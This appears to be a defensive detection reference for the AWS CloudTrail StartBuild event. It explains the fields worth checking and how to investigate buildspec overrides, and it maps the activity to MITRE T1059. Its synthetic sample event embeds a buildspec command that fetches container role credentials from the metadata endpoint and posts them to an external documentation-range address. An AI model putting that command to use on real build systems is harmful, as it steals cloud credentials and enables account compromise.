StartBuild
StartBuild
Event
Starts a build for a project, optionally overriding its source, buildspec, environment, or service role. A buildspec override can change commands; the caller initiating the build and the role used during execution are distinct. Queuing a build does not establish that commands ran.
Security Context
An unauthorized buildspec can execute shell code (T1059). Normal CI uses the same API. Access is bounded by the actual service-role policies and build environment; it is not automatically unrestricted or unlogged.
Log Source
CloudTrail management event with eventSource: codebuild.amazonaws.com and eventName: StartBuild. Inspect errorCode/errorMessage and follow-up state. A missing or null response body does not alone establish success or failure.
Key Fields
Fields below refer to requestParameters unless otherwise noted. Exact CloudTrail serialization should be checked against the original record.
| Field | Investigation value |
|---|---|
projectName, buildspecOverride | Project and replacement build instructions. |
serviceRoleOverride, sourceVersion, environmentVariablesOverride | Other relevant overrides if supplied; compare project defaults. |
userIdentity, eventTime, awsRegion, eventID (top level) | Caller/session, timeline, Region, and correlation identifiers. |
What to Investigate
- Confirm the recorded outcome and compare caller, target, and timing with the approved workflow.
- Compare overrides, source revision, initiator, and role delegation against approved CI activity.
- Follow the build ID through phase outcomes, build logs, and effective service-role permissions.
- Validate metadata availability and outbound network evidence before claiming the sample’s attempted credential transfer succeeded.
Sample Event
Synthetic scenario. The submitted buildspec attempts credential transfer to a documentation-only address. The returned build is QUEUED/IN_PROGRESS, not proof of script execution.
Exact CloudTrail field presence, response nesting, redaction, and timestamp formatting remain unverified against captured logs. Illustrative names do not establish intent or downstream behavior.
{ "eventVersion": "1.09", "userIdentity": { "type": "IAMUser", "principalId": "AIDADRAC0MALF0YBADGY", "arn": "arn:aws:iam::555123456789:user/draco", "accountId": "555123456789", "accessKeyId": "ASIADRAC0MALF0YEXAMP5", "userName": "draco", "sessionContext": { "attributes": { "creationDate": "2026-04-15T18:51:02Z", "mfaAuthenticated": "false" } } }, "eventTime": "2026-04-15T20:48:51Z", "eventSource": "codebuild.amazonaws.com", "eventName": "StartBuild", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.66", "userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6", "requestParameters": { "projectName": "occamy-pipeline-build", "buildspecOverride": "version: 0.2\nphases:\n build:\n commands:\n - curl -s 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI | curl -s --data-binary @- http://203.0.113.77/c" }, "responseElements": { "build": { "id": "occamy-pipeline-build:90000000-0000-4000-8000-000110110010", "arn": "arn:aws:codebuild:us-east-1:555123456789:build/occamy-pipeline-build:90000000-0000-4000-8000-000110110010", "buildNumber": 137, "startTime": "Apr 15, 2026 8:48:51 PM", "currentPhase": "QUEUED", "buildStatus": "IN_PROGRESS", "projectName": "occamy-pipeline-build", "initiator": "draco", "serviceRole": "arn:aws:iam::555123456789:role/OccamyCodeBuildRole", "encryptionKey": "arn:aws:kms:us-east-1:555123456789:alias/aws/s3", "logs": { "groupName": "/aws/codebuild/occamy-pipeline-build", "streamName": "90000000-0000-4000-8000-000110110010" } } }, "requestID": "90000000-0000-4000-8000-000110110010", "eventID": "90000000-0000-4000-8000-000110110011", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "555123456789", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256", "clientProvidedHostHeader": "codebuild.us-east-1.amazonaws.com" }}Sources
MITRE ATT&CK Mapping
Tactics: Execution
- T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...